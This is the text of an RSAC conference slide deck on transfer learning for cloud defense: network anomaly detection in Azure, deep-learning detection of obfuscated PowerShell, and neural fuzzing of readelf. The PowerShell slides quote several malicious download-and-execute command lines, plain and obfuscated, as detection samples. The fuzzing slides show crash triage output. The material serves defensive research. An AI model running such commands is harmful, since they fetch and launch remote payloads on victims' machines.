SlideShare una empresa de Scribd logo
1 de 40
Descargar para leer sin conexión
SESSION ID:
#RSAC
Mark Russinovich
TRANSFER LEARNING:
REPURPOSING ML ALGORITHMS FROM
DIFFERENT DOMAINS TO CLOUD DEFENSE
CSV-W02
CTO, Microsoft Azure
Microsoft
@markrussinovich
#RSAC
Leveraging intelligence across product lines
SQL Server + R
Microsoft
R Server Hadoop + R Spark + R
Azure Machine
Learning
Cortana
Intelligence Suite
R Tools/Python
Tools for
Visual Studio
Azure Notebooks
(JuPyTer)
Cognitive
Services Bot Framework Cortana
Office 365 Bing SkypeHoloLens
R Server
Microsoft CNTK
Xbox 360 Dynamics 365
#RSAC
Microsoft’s cloud security scale - Daily numbers
500 Million
Number of active Microsoft account users
18 Billion
Microsoft Account authentications
77 Million
Threats detected on devices
30 Million
Geo Login Anomaly Attacks deflected
1.5 Million
Number of compromise attempts deflected
#RSAC
#RSAC
Textbook ML development
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing Output
Choosing Run
Options
View Results
Debug and
Visualize Errors
Analyze Model
Predictions
#RSAC
Textbook ML development
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing Output
Choosing Run
Options
View Results
Debug and
Visualize Errors
Analyze Model
Predictions
#RSAC
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing
Output
Choosing Run
Options
View Results
Debug and
Visualize
Errors
Analyze
Model
Predictions
Fact | Industry grade ML solutions are highly exploratory
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing
Output
Choosing Run
Options
View Results
Debug and
Visualize
Errors
Analyze
Model
Predictions
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing
Output
Choosing Run
Options
View Results
Debug and
Visualize
Errors
Analyze
Model
Predictions
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing
Output
Choosing Run
Options
View Results
Debug and
Visualize
Errors
Analyze
Model
Predictions
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing
Output
Choosing Run
Options
View Results
Debug and
Visualize
Errors
Analyze
Model
Predictions
Choosing the
Learning Task
Defining Data
Input
Applying Data
Transforms
Choosing the
Learner
Choosing
Output
Choosing Run
Options
View Results
Debug and
Visualize
Errors
Analyze
Model
Predictions
Attempt 1 Attempt 2 Attempt 3
Attempt 4 Attempt n
#RSAC
Product Managers
Machine Learning
Experts
Security Experts
Assess security landscape and
identify monitoring opportunities
Update solution based
on customer feedback
Gather customer feedback
and improve product Compliance and Privacy
Ops Engineers
Engineers
Engineer for low latency, high
throughput and scale
Monitor performance and mitigate,
resolve, preempt outages
Ensure solution is compliant
to privacy laws
Fact | Industry grade security data science requires multiple experts
#RSAC
#RSAC
Traditional versus Transfer learning
Learning
system
Learning
system
Learning
system
Different tasks
Traditional Machine Learning Transfer Learning
Source tasks
Learning
system
Target task
Source: Pan, Sinno Jialin, and Qiang Yang. "A survey on transfer learning." IEEE Transactions on knowledge and data engineering
#RSAC
Why transfer learning
Commercial
success
Time 2016
Supervised
learning
Transfer
learning
Unsupervised
learning
Reinforcement
learning
Drivers of ML success in industry
Source: Ruder, Sebastian, “Transfer Learning - Machine Learning's Next Frontier
#RSAC
Problem
Build a generic approach to detecting
malicious incoming network activity
that works for all protocols
Hypothesis
Underlying network protocols, though
different, have similar behavior
Solution
Detect Attacker IPs using Ensemble
Tree Learning
Previous
No previous approach for generic
protocol suspicious activity for
Cloud VM
Case Study 1 | Detecting malicious network activity in Azure
Core Concept: Achieve transfer learning by grouping similar tasks
#RSAC
Ensemble Tree Learning applications at Microsoft
#RSAC
To get labels compare
Input data
Description
Number of outgoing SYN in short interactions
(log) Number of outgoing SYN in short interactions
Total percent outgoing SYN
Percent outgoing SYN in short interactions
Number of incoming FIN
Distinct incoming connections relative to total flows
Frequency of top most used port
Hourly standard deviation of destination IPs
Percent of outgoing SYN in long interactions
(log) Number of outgoing SYN
Number of flows on low frequency (rare) ports
Percent of outgoing FIN messages
Ratio of outgoing to incoming flows (TCP)
Ratio of outgoing to incoming flows (total)
Total number outgoing SYN
Features extractedIPFix data from Azure VMs
IP address in
the IPFix data:
10.2.3.40
3rd party threat intelligence feeds
Cyber Defense Operation
Threat Intelligence Center
MSRC
Previous Red team activities
If an IP from IPFix data is also present in TI feeds,
label flow as malicious
#RSAC
Tree Ensembles – Algorithm
Create subsets from the training data
by randomly sampling with replacement
Nexamples
M features
#RSAC
Tree Ensembles – Training
Rare Ports Flows
Number of
Outgoing SYN
Frequency of
Top Port
Number of
Incoming Flows
Standard
Deviation of IPs
Number of
Incoming FIN
Malicious
MaliciousBenign MaliciousBenign MaliciousBenign
Nexamples
M features
#RSAC
Tree Ensembles – Training
Standard
Deviation of IPs
Number of
Outgoing SYN
Frequency of
Top Port
Number of
Incoming FIN
Malicious
MaliciousBenign
Benign Benign
Nexamples
M features
#RSAC
Tree EnsemblesNexamples
M features
#RSAC
Take the
majority
vote of the
ensemble
New Record
Tree Ensembles – Testing
Malicious
Benign
Benign
Src Ip Dst IP Src Port
DST
Port
In Int Out Int DSCP Octets
10.1.1.5 10.2.2.8 2887 80 Eth0 Eth1 00 982
#RSAC
Model performance and productization
Model trained at regular intervals
Size of data: 3GB/hour
Communication with 5 Million different IPs per
hour
Completed within seconds
Classification runs multiple times a day
Completed within milliseconds
Dataset
True
positive rate
False
positive rate
Non Ensemble
Learning
82% 0.06%
Ensemble
Learning 85% 0.06%
Azure Security Center3 points improvement
#RSAC
Bonus
Classifier can be used as an effective canary for emerging attacks
#ofdetectedsuspiciousMongoDBscans
http://www.zdnet.com/article/mongodb-ransacked-now-27000-databases-hit-in-mass-ransom-attacks/
Time (days)
#RSAC
WannaCry Attack Timeline
1. Prior to the MS017-10 patch release, the SMB (port 445) scanning activity in Azure behaved per the standard baseline – i.e. sporadic incoming scans
2. Once released, we can notice a gradual increase in the number of successful scans (i.e. target responded) due to:
a. Official Microsoft patch being released – I.e. A small group of reverse engineers uncovered the bug
b. Metasploit module released to the public, making it easier to discover and exploit the vulnerability
c. Shadow Broker tool leaked, improving the Metasploit attack module and making it more widespread
3. A week before the attack, we can notice a sharp peak in the number of successful incoming scans over SMB – signaling a significant interest in the SMB protocol
#ofdetectedsuspiciousSMBscans
Any targeted attacked here?
Standard SMB (445)
Azure scanning activity
1 Increased SMB (445)
Azure scanning activity
2
Abnormal peak
in scanning
3
MS017-10
Patch released
Metasploit
exploit released
Shadow Broker
exploiter leak
A week before the
attack
Attack
started
Time (days)
#RSAC
Case Study 2 | Detecting Malicious PowerShell commands
Problem Statement
Detect malicious PowerShell
command lines
Hypothesis
Deep learning methods are capable of
efficient and precise detection of
malicious PowerShell commands
Solution
Collect large data set from Microsoft
Defender and apply Microsoft’s Deep
Learning toolkit (CNTK) for detection
Previous
Used machine learning
(3-gram sequence modeling)
Results: True positive rate = 89%
Core Concept: Transposing existing security problem into an already solved
problem from another domain
#RSAC
PowerShell command lines – difficult to detect
&( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+
"BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO'
+'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3'
+'g1t' ))
Invoke-Expression (New-Object
Net.WebClient).DownloadString('http://bit.ly/L3g1t')
Source: Bohannon, Daniel. “Invoke Obfuscation”, BlueHat 2016.
Command line: before obfuscation
Command line: after obfuscation
Rules don’t work well, because too
many regexes needs to be written
Classical machine learning doesn’t
work well, because every command
line is unique
No discernable pattern
#RSAC
#RSAC
Windows
Defender ATP
logging
Machine
Detonation
Collected Log
Hash
Machine
Timestamp
Command line
Malicious file
Dataset
#RSAC
Microsoft’s Deep Learning toolkit (CNTK) applications
#RSAC
Deeper learning = representation learning
Deep learning network
Input
layer
Hidden
layer 1
Hidden
layer 2
Hidden
layer 3
Output
layer
#RSAC
Deep learning system trained
for image recognition
"-ExecutionPolicy ByPass -NoProfile -command
$uytcccs=$env:temp+'*bs*.exe';(New-Object
Net.WebClient).DownloadFile('http://*pf*.top
/http/',$uytcccs);Start-Process $uytcccs"
& { (get-
date).ToUniversalTime().ToString('yyyy-MM-
dd-HH:mm:ss.fff') }
Convert PowerShell commands to images
Technique overview
#RSAC
Model performance and productization
6 points improvement!
Model trained in regular intervals
Size of data: 400GB per day
Completed within minutes
Classification runs multiple times a day
Completed within seconds
Dataset
True
positive rate
False
positive rate
Previous
method
89% 0.004%
Deep learning 95.7% 0.004%
#RSAC
Case Study 3 | Neural Fuzzing
Problem Statement
Fuzz-testing file parsers to discover
security vulnerabilities
Hypothesis
Fuzz testing heuristics can be learned and
generalized from an existing graybox fuzzer.
Some control locations are more interesting to
fuzz than others.
Solution
Insert a neural model in the fuzz/test feedback loop.
Learn and generalize a strategy from an existing
fuzzer (AFL), using sequence to sequence neural
architectures. Augment original fuzzer with
generalized strategy.
Previous
Blackbox fuzzing: e.g. random mutations
Whitebox fuzzing: e.g. dynamic analysis
Graybox fuzzing: human crafted mutation heuristics
aimed at maximizing code coverage
Core Concept: Transposing existing security problem into an already solved
problem from another domain
#RSAC
Seq2Seq Neural Architecture
Cortana Microsoft Translator
#RSAC
Improved fuzzing intuition
Model
Input: Mutated files that have increased code coverage
Encode input file content as a sequence of bytes
Train with neural network architectures good at handling
variable length sequences: LSTM, sequence-to-sequence
Learned function
Heatmaps of “usefulness” rating for each bit location in the
input file
Scoring
Measured as potential to help
discover new code paths
1 = mutation at this location will
likely help discover new code paths
0 = ignore file location from
mutation
#RSAC
readelf dataset example
180 input files divided into training and validation sets
24h run of AFL on training set
Training data collected
Mutated files generated by AFL
Code-coverage bitmaps from
execution of the target program on
mutated inputs
Sampled at 1%
Training Validation
~200kb per file
#RSAC
Example | readelf 2.28 model
Heatmap produced for one given ELF file
Red locations are deemed interesting to mutate
ELF Header format (Source: Wikipedia)
… … … …
0x3A 2 e_shentsize size of a section header table entry.
0x3C 2 e_shnum number of entries in the section header table.
0x3E 2 e_shstrndx
index of the section header table entry that
contains the section names.
#RSAC
#RSAC
Analysis by GDB exploitable plugin https://github.com/jfoote/exploitable
Target: Linux readelf 2.28
Program received signal SIGSEGV, Segmentation fault.
0x000000000055e30b in byte_put_little_endian (field=0x1007dd6f6 <error:
Cannot access memory at address 0x1007dd6f6>, value=0, size=2) at elfcomm.c:81
Description: Access violation on destination operand
Short description: DestAv (8/22)
Hash: 23ebf3e1c7d53d629ee996b7a33e133e.eddea00d61e72e006d47dab261ea1f05
Exploitability Classification: EXPLOITABLE
Explanation: The target crashed on an access violation at an address matching the destination operand of the
instruction. This likely indicates a write access violation, which means the attacker may control the write
address and/or value.
Other tags: AccessViolation (21/22)
Program received signal SIGSEGV, Segmentation fault.
0x000000000045a9f3 in target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>,
reloc=0x7ddfb8) at readelf.c:11629
Description: Access violation on source operand
Short description: SourceAv (19/22)
Hash: 6f55d3fddb7262be6e31745ee2574742.d27dd344b9a2892fc0d4d4f739f2f639
Exploitability Classification: UNKNOWN
Explanation: The target crashed on an access violation at an address matching the source operand of the current
instruction. This likely indicates a read access violation.
Other tags: AccessViolation (21/22)
Program received signal SIGSEGV, Segmentation fault.
0x000000000055e283 in byte_put_little_endian (field=0xff000000007de2f2 <error: Cannot access memory at address
0xff000000007de2f2>, value=18446744073709551611, size=4) at elfcomm.c:75
Description: Access violation
Short description: AccessViolation (21/22)
Hash: 5a23cb8faf4189a00a5872ce9565218c.5de26e356c24993825d74ceade27e81f
Exploitability Classification: UNKNOWN
Explanation: The target crashed due to an access violation but there is not enough additional information available to
determine exploitability.
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
Description: Heap error
Short description: HeapError (10/22)
Hash: cc68e1a9699d9946c2efe4adb95e6f13.f6583f17f75906da3c88b0cd8e5d6c7a
Exploitability Classification: EXPLOITABLE
Explanation: The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function
when it stopped. This could be due to heap corruption, passing a bad pointer to a heap
function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally
considered exploitable.
Other tags: AbortSignal (20/22)
Program received signal SIGSEGV, Segmentation fault.
target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dd828) at readelf.c:11666
Description: Access violation near NULL on source operand
Short description: SourceAvNearNull (16/22)
Hash: e0167387d6ee8286447199f310e69c4d.faf899c223c7d3c22b94eba413b011f8
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This
likely indicates a read access violation, which may mean the application crashed on a s
imple NULL dereference to data structure that has no immediate effect on control of the processor.
Other tags: AccessViolation (21/22)
Program received signal SIGSEGV, Segmentation fault.
target_specific_reloc_handling (symtab=<optimized out>, start=<optimized out>, reloc=0x7dde40) at readelf.c:11695
Description: Access violation near NULL on source operand
Short description: SourceAvNearNull (16/22)
Hash: 73ce00dc337b153d0ecef457ecb08164.37705e2795c3218a99249070847f80f8
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This
likely indicates a read access violation, which may mean the application crashed on a s
imple NULL dereference to data structure that has no immediate effect on control of the processor.
Other tags: AccessViolation (21/22)
CVE-2017-6965
6 crash sites: 2 EXPLOITABLE, 2 UNKNOWN, 2 NOT EXPLOITABLE
Found by Neural AFL but not standard AFL | All fixed in readelf 2.30
#RSAC
Readelf model performance over 48h and productization
Model trained
Size of data: 20 GB
Collected from: a 24h fuzzing run of AFL
Completed within: 12h
Model query
AFL modified to query model 50% of the time
Dataset
Unique
Code Paths
Number
of Crashes
AFL 8,123 1
Neural 9,207 62
Bugs reproduced, triaged, and reported automatically in MSRD
web portal for software being tested
(https://www.microsoft.com/en-us/security-risk-detection/)
#RSAC
Conclusion
• Transfer Learning helps
• To reuse already developed algorithms in an organization
• To conserve resources across projects
• Three Early Attempts at Transfer Learning:
• Detecting Malicious Network Activity in Azure
• Detecting Obfuscated PowerShell command lines
• Fuzzing using Neural Nets
#RSAC
Resources
• Microsoft Booth at RSA
• Experiment with Transfer Learning - https://docs.microsoft.com/en-us/cognitive-
toolkit/Build-your-own-image-classifier-using-Transfer-Learning
• Publications:
• Detecting Obfuscated PowerShell - https://arxiv.org/pdf/1804.04177.pdf
• Neural Fuzzing - https://www.microsoft.com/en-us/research/publication/not-all-
bytes-are-equal-neural-byte-sieve-for-fuzzing/
• Free Online Training:
• Azure Security and Compliance (edX) - https://www.edx.org/course/azure-security-
and-compliance
• Microsoft Professional Program For AI https://academy.microsoft.com/en-
us/professional-program/tracks/artificial-intelligence/

Más contenido relacionado

La actualidad más candente

CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryPriyanka Aash
 
SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.Priyanka Aash
 
Identity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsIdentity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsPriyanka Aash
 
Serverless Attack Vectors
Serverless Attack VectorsServerless Attack Vectors
Serverless Attack VectorsTeri Radichel
 
Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Teri Radichel
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWSTeri Radichel
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Teri Radichel
 
Alfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureAlfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureDevSecCon
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Teri Radichel
 
(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN SecurityPriyanka Aash
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedPriyanka Aash
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonMoses Schwartz
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and ResponseAlert Logic
 
You Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsYou Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsSumo Logic
 
Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Priyanka Aash
 
AWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials   challenges in prevention detection mitigationAWS temporary credentials   challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigationJohn Varghese
 
An experiment in agile threat modelling
An experiment in agile threat modellingAn experiment in agile threat modelling
An experiment in agile threat modellingDevSecCon
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android BotPriyanka Aash
 
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarMaking the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarSumo Logic
 

La actualidad más candente (20)

CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & RecoveryCLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
CLOUD SECURITY ESSENTIALS 2.0 Full Stack Hacking & Recovery
 
SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.SDN and Security: A Marriage Made in Heaven. Or Not.
SDN and Security: A Marriage Made in Heaven. Or Not.
 
Identity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of ThingsIdentity-Based Security and Privacy for the Internet of Things
Identity-Based Security and Privacy for the Internet of Things
 
Serverless Attack Vectors
Serverless Attack VectorsServerless Attack Vectors
Serverless Attack Vectors
 
Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?Are You Ready for a Cloud Pentest?
Are You Ready for a Cloud Pentest?
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWS
 
Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018Red Team vs Blue Team on AWS - RSA 2018
Red Team vs Blue Team on AWS - RSA 2018
 
Alfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azureAlfredo Reino - Monitoring aws and azure
Alfredo Reino - Monitoring aws and azure
 
Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018Red Team vs. Blue Team on AWS ~ re:Invent 2018
Red Team vs. Blue Team on AWS ~ re:Invent 2018
 
(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security(SACON 2020) Adventures In SDN Security
(SACON 2020) Adventures In SDN Security
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities Revisited
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with Python
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and Response
 
You Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOpsYou Build It, You Secure It: Introduction to DevSecOps
You Build It, You Secure It: Introduction to DevSecOps
 
Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?Smart Megalopolises. How Safe and Reliable Is Your Data?
Smart Megalopolises. How Safe and Reliable Is Your Data?
 
AWS temporary credentials challenges in prevention detection mitigation
AWS temporary credentials   challenges in prevention detection mitigationAWS temporary credentials   challenges in prevention detection mitigation
AWS temporary credentials challenges in prevention detection mitigation
 
An experiment in agile threat modelling
An experiment in agile threat modellingAn experiment in agile threat modelling
An experiment in agile threat modelling
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
 
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic WebinarMaking the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
Making the Shift from DevOps to Practical DevSecOps | Sumo Logic Webinar
 

Similar a Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense

Advances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defenseAdvances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defensePriyanka Aash
 
Intelligent Monitoring
Intelligent MonitoringIntelligent Monitoring
Intelligent MonitoringIntelie
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk
 
Accelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPUAccelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPUJoshua Patterson
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity InnovationPete Burnap
 
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case StudyFinding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case StudyDevOps.com
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Neelu Tripathy
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalPriyanka Aash
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
Creating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & VisualizationCreating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & VisualizationRaffael Marty
 
Secure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer SolitaSecure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer SolitaJoona Immonen
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary:  Creating a Threat-Based Cyber TeamKeeping Up with the Adversary:  Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamPriyanka Aash
 
Spark Streaming Early Warning Use Case
Spark Streaming Early Warning Use CaseSpark Streaming Early Warning Use Case
Spark Streaming Early Warning Use Caserandom_chance
 
Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Barry Greene
 
Advanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest FiresAdvanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest FiresIvo Andreev
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 

Similar a Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense (20)

Advances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defenseAdvances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defense
 
Intelligent Monitoring
Intelligent MonitoringIntelligent Monitoring
Intelligent Monitoring
 
Presentation1.pptx
Presentation1.pptxPresentation1.pptx
Presentation1.pptx
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-On
 
Accelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPUAccelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPU
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity Innovation
 
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case StudyFinding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
 
Cybersecurity - Jim Butterworth
Cybersecurity - Jim ButterworthCybersecurity - Jim Butterworth
Cybersecurity - Jim Butterworth
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable Final
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Creating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & VisualizationCreating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & Visualization
 
Secure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer SolitaSecure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer Solita
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary:  Creating a Threat-Based Cyber TeamKeeping Up with the Adversary:  Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
 
Spark Streaming Early Warning Use Case
Spark Streaming Early Warning Use CaseSpark Streaming Early Warning Use Case
Spark Streaming Early Warning Use Case
 
Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1
 
Advanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest FiresAdvanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest Fires
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 

Más de Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
